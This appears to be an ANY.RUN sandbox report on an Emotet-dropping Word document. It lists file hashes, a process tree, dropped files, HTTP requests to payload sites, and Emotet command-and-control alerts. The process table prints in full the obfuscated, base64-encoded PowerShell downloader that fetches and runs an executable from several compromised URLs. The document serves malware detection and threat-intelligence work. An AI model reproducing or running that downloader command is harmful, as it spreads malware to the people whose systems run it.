analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

HQ1803538797SG.doc

Full analysis: https://app.any.run/tasks/321cfb79-6e0b-409a-b1a2-e66d9da8678b
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: January 18, 2020, 02:30:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
loader
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Perferendis., Author: Ethan Pons, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 17 22:29:00 2020, Last Saved Time/Date: Fri Jan 17 22:29:00 2020, Number of Pages: 2, Number of Words: 5, Number of Characters: 29, Security: 0
MD5:

BEEE888C14539F9628DC71DB0728A9F3

SHA1:

D18AAFDFE4764B05B066DE1BA03EC428A6EB7C77

SHA256:

1D46BE9D409CE3FDCD0D2513CAF7095089DCD3F1382F549FBF2671912F6C3CAC

SSDEEP:

6144:W0Rum7mdLRp1bbSBIR/EHGtCMXgTo8qoFt/etg+3eOaGD9iw6:W0E3dxtR/iU9mvUPy8iw6

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 296.exe (PID: 3892)
      • 296.exe (PID: 3628)
      • serialfunc.exe (PID: 2340)
      • serialfunc.exe (PID: 3800)
    • Emotet process was detected

      • 296.exe (PID: 3628)
    • Downloads executable files from the Internet

      • Powershell.exe (PID: 3284)
    • Changes the autorun value in the registry

      • serialfunc.exe (PID: 3800)
    • Connects to CnC server

      • serialfunc.exe (PID: 3800)
    • EMOTET was detected

      • serialfunc.exe (PID: 3800)
  • SUSPICIOUS

    • Executed via WMI

      • Powershell.exe (PID: 3284)
    • Creates files in the user directory

      • Powershell.exe (PID: 3284)
    • Executable content was dropped or overwritten

      • 296.exe (PID: 3628)
      • Powershell.exe (PID: 3284)
    • PowerShell script executed

      • Powershell.exe (PID: 3284)
    • Starts itself from another location

      • 296.exe (PID: 3628)
    • Connects to server without host name

      • serialfunc.exe (PID: 3800)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2364)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2364)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Title: Perferendis.
Subject: -
Author: Ethan Pons
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2020:01:17 22:29:00
ModifyDate: 2020:01:17 22:29:00
Pages: 2
Words: 5
Characters: 29
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 33
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 25
CompObjUserType: Microsoft Forms 2.0 Form
No data.
screenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
42
Monitored processes
6
Malicious processes
5
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 296.exe no specs #EMOTET 296.exe serialfunc.exe no specs #EMOTET serialfunc.exe

Process information

PID
CMD
Path
Indicators
Parent process
2364"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\HQ1803538797SG.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3284Powershell -w hidden -en JABTAG8AbgBsAGYAbQB4AGYAZwBsAGcAPQAnAFgAeQB5AHMAbgBrAGkAdQB5AHgAbwAnADsAJABFAGMAegBhAGQAeAB2AGUAYwAgAD0AIAAnADIAOQA2ACcAOwAkAFoAegByAHIAegBlAGIAeQBzAGUAPQAnAFYAcAB5AGIAeAB4AHAAbQBkAGUAeQBkAHEAJwA7ACQATQB3AGIAZwBvAHIAaAByAHkAZgBoAG4AZQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARQBjAHoAYQBkAHgAdgBlAGMAKwAnAC4AZQB4AGUAJwA7ACQAUwB1AHIAegBkAHgAZAB5AGcAcAB0AGgAPQAnAFkAZgB1AGYAbgBwAHMAdwB4AHoAJwA7ACQATAB2AGIAbwBqAG8AbAB4AHYAeABtAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMAbABJAGUATgBUADsAJABGAHYAbwB2AGEAZABzAGgAaAB0AGIAbwA9ACcAaAB0AHQAcAA6AC8ALwBhAGQAeQBrAHUAcgBuAGkAYQB3AGEAbgAuAGMAbwBtAC8AbQBwADMALwAxADgAbwB4ADYAaAAvACoAaAB0AHQAcAA6AC8ALwBtAHkAcABoAGEAbQB0AGgAYQBuAGgAYgBpAG4AaAAuAG4AZQB0AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAcABsAG8AYQBkAHMALwBxAEQAcQAvACoAaAB0AHQAcAA6AC8ALwBzAGYAbQBhAGMALgBiAGkAegAvAGMAYQBsAGUAbgBkAGEAcgAvAEsAMQBhAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AbQBqAG0AZQBjAGgAYQBuAGkAYwBhAGwALgBjAG8AbQAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAGQAZAB5AC8AKgBoAHQAdABwADoALwAvAG0AbwBqAGUAaABhAGYAdABvAG0ALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvADEAMwA3ADQAeAB2AC8AJwAuACIAcwBgAHAATABpAHQAIgAoACcAKgAnACkAOwAkAFYAZwB1AGIAbgBiAGgAbABpAGUAYgBlAD0AJwBTAHIAcwBtAGQAcQBpAGEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFEAdABzAHcAegBnAGYAcwBrAGkAagAgAGkAbgAgACQARgB2AG8AdgBhAGQAcwBoAGgAdABiAG8AKQB7AHQAcgB5AHsAJABMAHYAYgBvAGoAbwBsAHgAdgB4AG0ALgAiAEQAYABvAHcAbgBsAGAAbwBhAGAAZABmAEkATABFACIAKAAkAFEAdABzAHcAegBnAGYAcwBrAGkAagAsACAAJABNAHcAYgBnAG8AcgBoAHIAeQBmAGgAbgBlACkAOwAkAEQAeQBjAGMAYQB3AHcAcgBqAG0AYgB3AGUAPQAnAFMAegB2AGQAdQBlAHAAdwAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAE0AdwBiAGcAbwByAGgAcgB5AGYAaABuAGUAKQAuACIAbABlAGAATgBnAHQASAAiACAALQBnAGUAIAAyADkAMQA3ADcAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwB0AGAAQQByAHQAIgAoACQATQB3AGIAZwBvAHIAaAByAHkAZgBoAG4AZQApADsAJABEAGwAdwB6AGoAdgBiAHYAPQAnAFkAZgBsAG0AaABqAHYAdwBhAHYAbQAnADsAYgByAGUAYQBrADsAJABMAHEAbQB4AGoAdQBuAGMAcgBmAD0AJwBMAHYAagBjAGcAdgBpAGgAbAB1AHUAawAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABWAHUAegBsAGIAbwBxAGEAawBqAHcAPQAnAEIAagBuAGgAegBtAHQAdgBuAGwAdQB0ACcAC:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3892"C:\Users\admin\296.exe" C:\Users\admin\296.exePowershell.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
3628--b4d971edC:\Users\admin\296.exe
296.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
2340"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe"C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe296.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Exit code:
0
Version:
1, 0, 0, 76
3800--d6864438C:\Users\admin\AppData\Local\serialfunc\serialfunc.exe
serialfunc.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Application MFC DShowEncoder
Version:
1, 0, 0, 76
Total events
2 230
Read events
1 418
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
3

Dropped files

PID
Process
Filename
Type
2364WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA7F2.tmp.cvr
MD5:
SHA256:
2364WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~DFB175A377DE7F23F0.TMP
MD5:
SHA256:
3284Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EBERAX1T56EM3SN1PH3J.temp
MD5:
SHA256:
3284Powershell.exeC:\Users\admin\296.exe
MD5:
SHA256:
2364WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$1803538797SG.docpgc
MD5:71FE3A8DD72CF437770E280EA103D441
SHA256:BCC923D41D90B1D09783901C7800BA2949913F0D7345C4F219E59463F1230935
3284Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
3284Powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF39b2c0.TMPbinary
MD5:35375F3D71AE42AA9777154D256B33BF
SHA256:BCFF55E0934722E7952EA75D73AE7CE376E4ADBC73DE5E71D629975E9EAC87EF
2364WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:99928F4AC5E07134303FA77CC599CA07
SHA256:607F328EBE2E701B1AEC941D3FBEAEE4403DE8DFE86158A3D67A0BDCA918E8FB
2364WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:C82FC1365C17946A1D9EA54CEFBA7D88
SHA256:46A8019834ADC1813B30D04D7B4DB52D307FA3B87800E402276C2290ABC9E703
3628296.exeC:\Users\admin\AppData\Local\serialfunc\serialfunc.exeexecutable
MD5:5191405A59A75E43108A1801A604AB26
SHA256:B032CC338099F7B3B9CE9B7E7B763B118767D2EDAA7F994B3629F29A20C1591B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
3
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3284
Powershell.exe
GET
302
45.64.1.202:80
http://adykurniawan.com/mp3/18ox6h/
ID
html
233 b
malicious
3284
Powershell.exe
GET
200
45.64.1.202:80
http://adykurniawan.com/cgi-sys/suspendedpage.cgi
ID
html
7.41 Kb
malicious
3284
Powershell.exe
GET
200
35.237.206.52:80
http://myphamthanhbinh.net/wp-content/uploads/qDq/
US
executable
344 Kb
suspicious
3800
serialfunc.exe
POST
200
100.6.23.40:80
http://100.6.23.40/ntNGhCKg9TRaqG
US
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3284
Powershell.exe
45.64.1.202:80
adykurniawan.com
PT Master Web Network
ID
malicious
100.6.23.40:80
MCI Communications Services, Inc. d/b/a Verizon Business
US
malicious
3284
Powershell.exe
35.237.206.52:80
myphamthanhbinh.net
US
suspicious

DNS requests

Domain
IP
Reputation
adykurniawan.com
  • 45.64.1.202
unknown
myphamthanhbinh.net
  • 35.237.206.52
suspicious

Threats

PID
Process
Class
Message
3284
Powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3284
Powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3284
Powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3800
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M5
3800
serialfunc.exe
A Network Trojan was detected
ET TROJAN Win32/Emotet CnC Activity (POST) M6
3800
serialfunc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
1 ETPRO signatures available at the full report
No debug info